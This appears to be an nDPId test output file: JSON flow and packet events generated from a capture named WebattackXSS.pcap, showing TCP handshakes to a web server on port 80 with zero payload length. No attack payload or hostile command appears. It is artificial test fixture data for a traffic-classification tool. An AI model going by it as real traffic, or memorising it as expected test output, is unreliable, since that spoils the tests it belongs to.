+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347783176,"flow_last_seen":1499347783176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347783176,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60882,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":1,"flow_last_seen":1499347783176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347783176,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8URhAAD4GdLisEAABwKgKMu3SAFAelFVWAAAAAKACchD3bAAAAgQFtAQCCAoBPAROAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6802,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":2,"flow_last_seen":1499347783176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347783176,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7dLS\/qxUHpRVV6AScSCfTwAAAgQFtAQCCAoD5dXDATwETgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":3,"flow_last_seen":1499347783177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347783177,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0URlAAD4GdL+sEAABwKgKMu3SAFAelFVX0v6sVYAQAOU+VgAAAQEICgE8BE8D5dXD"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6810,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347784519,"flow_last_seen":1499347784519,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347784519,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60896,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6810,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":1,"flow_last_seen":1499347784519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347784519,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CDdAAD4GvZmsEAABwKgKMu3gAFDyig2pAAAAAKACchBpxQAAAgQFtAQCCAoBPAWeAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6811,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":2,"flow_last_seen":1499347784520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347784520,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7eBCNUBH8ooNqqAScSANLwAAAgQFtAQCCAoD5dcTATwFngEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":3,"flow_last_seen":1499347784520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347784520,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CDhAAD4GvaCsEAABwKgKMu3gAFDyig2qQjVASIAQAOWsNQAAAQEICgE8BZ8D5dcT"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6831,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347787097,"flow_last_seen":1499347787097,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347787097,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6831,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":1,"flow_last_seen":1499347787097,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347787097,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87ftAAD4G19SsEAABwKgKMu36AFCLoOXYAAAAAKACchD14AAAAgQFtAQCCAoBPAgjAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":2,"flow_last_seen":1499347787098,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347787098,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7fr\/T2fti6Dl2aAScSCyBQAAAgQFtAQCCAoD5dmXATwIIwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6833,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":3,"flow_last_seen":1499347787098,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347787098,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07fxAAD4G19usEAABwKgKMu36AFCLoOXZ\/09n7oAQAOVRDQAAAQEICgE8CCMD5dmX"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6840,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347788375,"flow_last_seen":1499347788375,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347788375,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6840,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":1,"flow_last_seen":1499347788375,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347788375,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8h61AAD4GPiOsEAABwKgKMu4IAFB6rY7PAAAAAKACchBckAAAAgQFtAQCCAoBPAliAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6841,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":2,"flow_last_seen":1499347788375,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347788375,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7gg8gqx8eq2O0KAScSCVswAAAgQFtAQCCAoD5drXATwJYgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":3,"flow_last_seen":1499347788376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347788376,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0h65AAD4GPiqsEAABwKgKMu4IAFB6rY7QPIKsfYAQAOU0uwAAAQEICgE8CWID5drX"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6852,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347789640,"flow_last_seen":1499347789640,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347789640,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60950,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6852,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":1,"flow_last_seen":1499347789640,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347789640,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83o1AAD4G50KsEAABwKgKMu4WAFDDudQTAAAAAKACchDM9QAAAgQFtAQCCAoBPAqeAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6853,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":2,"flow_last_seen":1499347789640,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347789640,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7hacXl08w7nUFKAScSD0QAAAAgQFtAQCCAoD5dwTATwKngEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6854,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":3,"flow_last_seen":1499347789641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347789641,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03o5AAD4G50msEAABwKgKMu4WAFDDudQUnF5dPYAQAOWTRwAAAQEICgE8Cp8D5dwT"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6871,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347792291,"flow_last_seen":1499347792291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792291,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6871,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":1,"flow_last_seen":1499347792291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347792291,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GCRAAD4GraysEAABwKgKMu4wAFDmKhURAAAAAKACchBm1gAAAgQFtAQCCAoBPA01AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":2,"flow_last_seen":1499347792291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347792291,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7jDnRnKf5ioVEqAScSArPwAAAgQFtAQCCAoD5d6qATwNNQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":3,"flow_last_seen":1499347792291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347792291,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GCVAAD4GrbOsEAABwKgKMu4wAFDmKhUS50ZyoIAQAOXKRgAAAQEICgE8DTUD5d6q"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347659123,"flow_last_seen":1499347664799,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59556,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347659123,"flow_last_seen":1499347664799,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59556,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347660441,"flow_last_seen":1499347665799,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59570,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347660441,"flow_last_seen":1499347665799,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59570,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347661705,"flow_last_seen":1499347666802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59584,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347661705,"flow_last_seen":1499347666802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59584,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347664226,"flow_last_seen":1499347669803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59610,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347664226,"flow_last_seen":1499347669803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59610,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347665473,"flow_last_seen":1499347670803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59624,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347665473,"flow_last_seen":1499347670803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6882,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347793575,"flow_last_seen":1499347793575,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347793575,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6882,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":1,"flow_last_seen":1499347793575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347793575,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86x9AAD4G2rCsEAABwKgKMu4+AFCp1uVpAAAAAKACchDRggAAAgQFtAQCCAoBPA52AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":2,"flow_last_seen":1499347793575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347793575,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7j6t+bU4qdblaqAScSCLXgAAAgQFtAQCCAoD5d\/rATwOdgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6884,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":3,"flow_last_seen":1499347793576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347793576,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06yBAAD4G2resEAABwKgKMu4+AFCp1uVqrfm1OYAQAOUqZgAAAQEICgE8DnYD5d\/r"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6903,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347796130,"flow_last_seen":1499347796130,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347796130,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32784,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6903,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":1,"flow_last_seen":1499347796130,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347796130,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dkVAAD4GT4usEAABwKgKMoAQAFA7jGawAAAAAKACchAqNgAAAgQFtAQCCAoBPBD1AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":2,"flow_last_seen":1499347796130,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347796130,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgBCKrPedO4xmsaAScSDCewAAAgQFtAQCCAoD5eJpATwQ9QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6905,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":3,"flow_last_seen":1499347796130,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347796130,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dkZAAD4GT5KsEAABwKgKMoAQAFA7jGaxiqz3noAQAOVhgwAAAQEICgE8EPUD5eJp"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6912,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347797419,"flow_last_seen":1499347797419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347797419,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32798,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6912,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":1,"flow_last_seen":1499347797419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347797419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tZJAAD4GED6sEAABwKgKMoAeAFBmW6elAAAAAKACchC9IQAAAgQFtAQCCAoBPBI3AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6913,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":2,"flow_last_seen":1499347797419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347797419,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgB7MdTcTZlunpqAScSDS5QAAAgQFtAQCCAoD5eOsATwSNwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6915,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":3,"flow_last_seen":1499347797420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347797420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tZNAAD4GEEWsEAABwKgKMoAeAFBmW6emzHU3FIAQAOVx7QAAAQEICgE8EjcD5eOs"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6924,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347798713,"flow_last_seen":1499347798713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347798713,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 